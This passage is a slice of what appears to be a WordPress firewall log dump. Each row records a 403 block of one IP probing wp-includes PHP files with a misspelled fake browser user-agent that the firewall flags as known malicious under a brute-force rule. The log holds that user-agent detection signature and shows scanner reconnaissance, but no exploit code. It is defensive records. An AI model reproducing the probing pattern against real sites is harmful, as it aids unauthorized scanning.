User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNlc3Npb24tdG9rZW5zLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133666,1699888515.707439,1699888515.698700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','http://eckankar-colorado.org/wp-includes/class-wp-scripts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133667,1699888515.370113,1699888515.361500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-roles.php','http://eckankar-colorado.org/wp-includes/class-wp-roles.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJvbGVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133668,1699888515.020705,1699888515.011100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-role.php','http://eckankar-colorado.org/wp-includes/class-wp-role.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJvbGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133669,1699888514.682567,1699888514.673900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-rewrite.php','http://eckankar-colorado.org/wp-includes/class-wp-rewrite.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJld3JpdGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133670,1699888514.345315,1699888514.334800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-recovery-mode.php','http://eckankar-colorado.org/wp-includes/class-wp-recovery-mode.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJlY292ZXJ5LW1vZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133671,1699888513.999585,1699888513.990900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-link-service.php','http://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-link-service.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJlY292ZXJ5LW1vZGUtbGluay1zZXJ2aWNlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133672,1699888513.659167,1699888513.650400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-key-service.php','http://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-key-service.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJlY292ZXJ5LW1vZGUta2V5LXNlcnZpY2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133673,1699888513.310393,1699888513.301700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-email-service.php','http://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-email-service.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJlY292ZXJ5LW1vZGUtZW1haWwtc2VydmljZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133674,1699888512.953892,1699888512.945200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-cookie-service.php','http://eckankar-colorado.org/wp-includes/class-wp-recovery-mode-cookie-service.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXJlY292ZXJ5LW1vZGUtY29va2llLXNlcnZpY2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133675,1699888512.576269,1699888512.561000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-query.php','http://eckankar-colorado.org/wp-includes/class-wp-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXF1ZXJ5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133676,1699888512.225660,1699888512.217000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-post.php','http://eckankar-colorado.org/wp-includes/class-wp-post.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXBvc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133677,1699888511.886241,1699888511.877700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-post-type.php','http://eckankar-colorado.org/wp-includes/class-wp-post-type.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXBvc3QtdHlwZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133678,1699888511.549150,1699888511.539300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-paused-extensions-storage.php','http://eckankar-colorado.org/wp-includes/class-wp-paused-extensions-storage.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXBhdXNlZC1leHRlbnNpb25zLXN0b3JhZ2UucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133679,1699888511.210943,1699888511.201600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-oembed.php','http://eckankar-colorado.org/wp-includes/class-wp-oembed.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW9lbWJlZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133680,1699888510.699062,1699888510.690200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-oembed-controller.php','http://eckankar-colorado.org/wp-includes/class-wp-oembed-controller.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW9lbWJlZC1jb250cm9sbGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133681,1699888510.355562,1699888510.346900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-object-cache.php','http://eckankar-colorado.org/wp-includes/class-wp-object-cache.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW9iamVjdC1jYWNoZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133682,1699888510.016464,1699888510.007000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-network.php','http://eckankar-colorado.org/wp-includes/class-wp-network.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW5ldHdvcmsucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133683,1699888509.669355,1699888509.660600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-network-query.php','http://eckankar-colorado.org/wp-includes/class-wp-network-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW5ldHdvcmstcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133684,1699888509.323355,1699888509.308200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-navigation-fallback.php','http://eckankar-colorado.org/wp-includes/class-wp-navigation-fallback.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW5hdmlnYXRpb24tZmFsbGJhY2sucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133685,1699888508.922721,1699888508.913400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-metadata-lazyloader.php','http://eckankar-colorado.org/wp-includes/class-wp-metadata-lazyloader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW1ldGFkYXRhLWxhenlsb2FkZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133686,1699888508.414779,1699888508.406000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-meta-query.php','http://eckankar-colorado.org/wp-includes/class-wp-meta-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW1ldGEtcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133687,1699888508.083774,1699888508.075000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-matchesmapregex.php','http://eckankar-colorado.org/wp-includes/class-wp-matchesmapregex.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLW1hdGNoZXNtYXByZWdleC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133688,1699888507.591895,1699888506.805100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-locale.php','http://eckankar-colorado.org/wp-includes/class-wp-locale.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWxvY2FsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133689,1699888506.474055,1699888506.463900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-locale-switcher.php','http://eckankar-colorado.org/wp-includes/class-wp-locale-switcher.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWxvY2FsZS1zd2l0Y2hlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133690,1699888506.088164,1699888506.079400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-list-util.php','http://eckankar-colorado.org/wp-includes/class-wp-list-util.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 